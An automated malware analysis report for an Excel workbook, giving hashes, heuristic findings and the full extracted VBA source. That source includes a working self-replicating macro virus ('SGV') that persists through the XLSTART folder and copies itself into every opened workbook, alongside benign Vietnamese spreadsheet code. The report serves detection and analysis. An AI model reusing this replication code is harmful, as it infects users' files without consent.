Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 db957b491304ebd8…

MALICIOUS

Office (OLE) / .XLS

272.5 KB Created: 2004-11-26 06:40:11 Authoring application: Microsoft Excel First seen: 2026-06-13
MD5: f60b67e148ed30171f61397d8b471410 SHA-1: d494e9ed1ed90b7d716fe43d184e293b0048b5c3 SHA-256: db957b491304ebd89c1e03a537eea24a97c497717d3427785d08cc07b4007831
116 Risk Score

Heuristics 5

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
        ChDir Application.StartupPath
  • VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER
    The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
    Matched line in script
        Application.OnSheetActivate = "check_files"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9521 bytes
SHA-256: 82188ebf8968546c1997b9605100308f28d690180a6837e8626981cb77de7bd2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public bflag As Boolean

Private Sub Workbook_Open()
ActiveWorkbook.PrecisionAsDisplayed = True
End Sub

Private Sub Workbook_SheetCalculate(ByVal Sh As Object)
On Error Resume Next
If Sh.Name = "THDT" And bflag = False Then
    bflag = True
    Dim intFirstRow%, intLastRow%, intCol%
    With ActiveWorkbook
        intFirstRow = .CustomDocumentProperties("FirstRow")
        intLastRow = .CustomDocumentProperties("LastRow")
        intCol = .CustomDocumentProperties("Col")
    End With
    Dim i%, intRow%, strFormu$
    For i = intFirstRow To intLastRow
        If IsError(Sh.Cells(i, intCol).Value) = True Then
            strFormu = Sh.Cells(i, intCol).Formula
            Sh.Cells(i, intCol).Value = 0
            intRow = i
            Exit For
        End If
    Next
    Sh.Cells(intRow, intCol).Formula = strFormu
End If
End Sub



Attribute VB_Name = "SGV"





































Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "SGV.XLS")
    If m$ = "SGV.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    N4$ = ActiveWorkbook.Name
    Sheets("SGV").Visible = True
    Sheets("SGV").Select
    Sheets("SGV").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "SGV.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(N4$).Sheets("SGV").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "SGV.XLS!check_files"
    Case 1
    Application.ScreenUpdating = False
    N4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(N4$).Sheets(1).Name
    If s$ <> "SGV" Then
        Workbooks("SGV.XLS").Sheets("SGV").Copy before:=Workbooks(N4$).Sheets(1)
        Workbooks(N4$).Sheets("SGV").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "SGV.XLS!check_files"
    Case Else
End Select
End Sub

Attribute VB_Name = "Module1"
Option Explicit
Public Const LOCALE_USER_DEFAULT = &H400
Private Const LOCALE_SDECIMAL = &HE

'Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA" (ByVal Locale As Long, ByVal LCType As Long, ByVal lpLCData As String, ByVal cchData As Long) As Long
Dim strXMLPath$

Function Dround(Num As Double, place As Integer) As Double
   Dround = Round(Num * 10 ^ place) / 10 ^ place
End Function

Public Function Add_Refs(strPath$)
On Error GoTo m_exit
    Application.VBE.ActiveVBProject.References.AddFromFile strPath & "Adt2excel.dll"
    
Exit Function
m_exit:
    MsgBox Err.Number & ": " & Err.Description

End Function

Public Function CreateReport()
On Error GoTo m_exit
Dim cConnect As New ADODB.Connection
strXMLPath = ActiveWorkbook.CustomDocumentProperties("Where13")
    Call Open_Connection(ActiveWorkbook, cConnect)
    Call DuToanDGCT_MainInfo(ActiveWorkbook, cConnect, strXMLPath$)
    Set cConnect = Nothing
    Call Del_Refs

Exit Function
m_exit:
    MsgBox Err.Number & ": " & Err.Description

End Function

Public Function Del_Refs()
On Error Resume Next
    Dim i%
    Application.DefaultSaveFormat = 56 '=xlExcel8
    With Application.VBE.ActiveVBProject
        For i = 1 To .References.Count
            If .References(i).Name = "Adt2Excel" Then .References.Remove .References(i)
        Next
    End With
End Function

Public Function bangchu(so As Double, donvi As String, Optional ptdv As String) As String
bangchu = ""
If so = 0 Or so = Null Then Exit Function
If so < 0 Then
    bangchu = Sheets("Data").Cells(2, 5) & " " ' "am"
    so = -so
End If
If so < 1E+15 Then
    If Int(so) <> 0 Then
        bangchu = bangchu & viet(so) & " " & donvi
    End If
End If
bangchu = Trim(bangchu)
If bangchu <> "" Then
    bangchu = UCase(Left(bangchu, 1)) & Right(bangchu, Len(bangchu) - 1)
Else
    bangchu = Sheets("Data").Cells(1, 5) '"solon")
End If
End Function

Function viet(so As Double) As String
Dim chu As Variant, hang As Variant, sosai As Variant, thaythe As Variant
Dim s1 As String, s2 As String, x As Long, i As Integer
If so < 1E+15 Then
    ReDim chu(9)
    For i = 0 To 9
        chu(i) = Sheets("Data").Cells(i + 1, 1)
    Next
    ReDim hang(16)
    For i = 0 To 16
        hang(i) = Sheets("Data").Cells(i + 1, 2)
    Next
    ReDim sosai(11)
    For i = 0 To 11
        sosai(i) = Sheets("Data").Cells(i + 1, 3)
    Next
    ReDim thaythe(11)
    For i = 0 To 11
        thaythe(i) = Sheets("Data").Cells(i + 1, 4)
    Next
    s1 = Trim(Str(Int(so)))
    viet = ""
    If s1 = 0 Then Exit Function
    viet = chu(Val(Right(s1, 1)))
    For i = Len(s1) - 1 To 1 Step -1
        viet = chu(Val(Mid(s1, i, 1))) & " " & hang(Len(s1) - i - 1) & " " & viet
    Next
    viet = Trim(viet)
    For i = 0 To 11
        viet = thay(viet, "  ", " ")
        viet = thay(viet, CStr(sosai(i)), CStr(thaythe(i)))
    Next
    Else
    viet = Sheets("Data").Cells(1, 5) '"solon")
End If
End Function


Function thay(s1 As String, s2 As String, s3 As String) As String
Dim x As Long
thay = s1
x = InStr(1, thay, s2)
While x <> 0
thay = Left(thay, x - 1) & s3 & Right(thay, Len(thay) - x - Len(s2) + 1)
x = InStr(1, thay, s2)
Wend
thay = Trim(thay)
End Function

Function TKL(strCell$) ', Optional iRound% = 3)
Dim strCTCT$, inti%, inti1%
    strCTCT = strCell
    inti = InStrRev(strCTCT, ":")
    inti1 = InStrRev(strCTCT, "=")
    If inti = 0 And inti1 = 0 Then GoTo m_result
    If inti = 0 Then
        inti = inti1
    Else
        If inti1 > inti Then inti = inti1
    End If
    
    Select Case Right(Trim(Left(strCTCT, inti - 1)), 1)
    Case "<", ">"
        Exit Function
    End Select
    
    strCTCT = Replace(Right(strCTCT, Len(strCTCT) - inti), "x", "*")
    strCTCT = Replace(strCTCT, ",", ".")
m_result:
    TKL = Evaluate(strCTCT)
'    TKL = Round(Evaluate(strCTCT), iRound)
End Function


Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet12"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet14"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet13"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet19"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet20"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True